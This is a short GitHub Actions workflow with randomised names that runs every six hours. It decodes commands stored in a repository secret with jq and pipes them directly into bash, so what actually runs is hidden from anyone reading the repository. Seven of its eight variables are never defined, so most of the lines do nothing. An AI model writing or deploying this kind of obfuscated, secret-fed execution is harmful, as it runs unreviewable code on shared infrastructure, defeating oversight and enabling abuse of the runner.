name: numberfreethrow
on:
  workflow_dispatch:
  schedule:
    - cron: '59 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: numberfreethrow
        env:
          jbnob2: ${{ secrets.jbnob2 }}
        run: |
          echo $jbnob2 | jq -r .i0505 | /bin/bash
          echo $gslxj7 | jq -r .y8 | /bin/bash
          echo $xwxba786 | jq -r .xo858 | /bin/bash
          echo $yboe084 | jq -r .klyz6807 | /bin/bash
          echo $a83 | jq -r .t402 | /bin/bash
          echo $xjil0 | jq -r .z79 | /bin/bash
          echo $ahbu6036 | jq -r .ewwoh78093 | /bin/bash
          echo $l8 | jq -r .anzgx33445 | /bin/bash

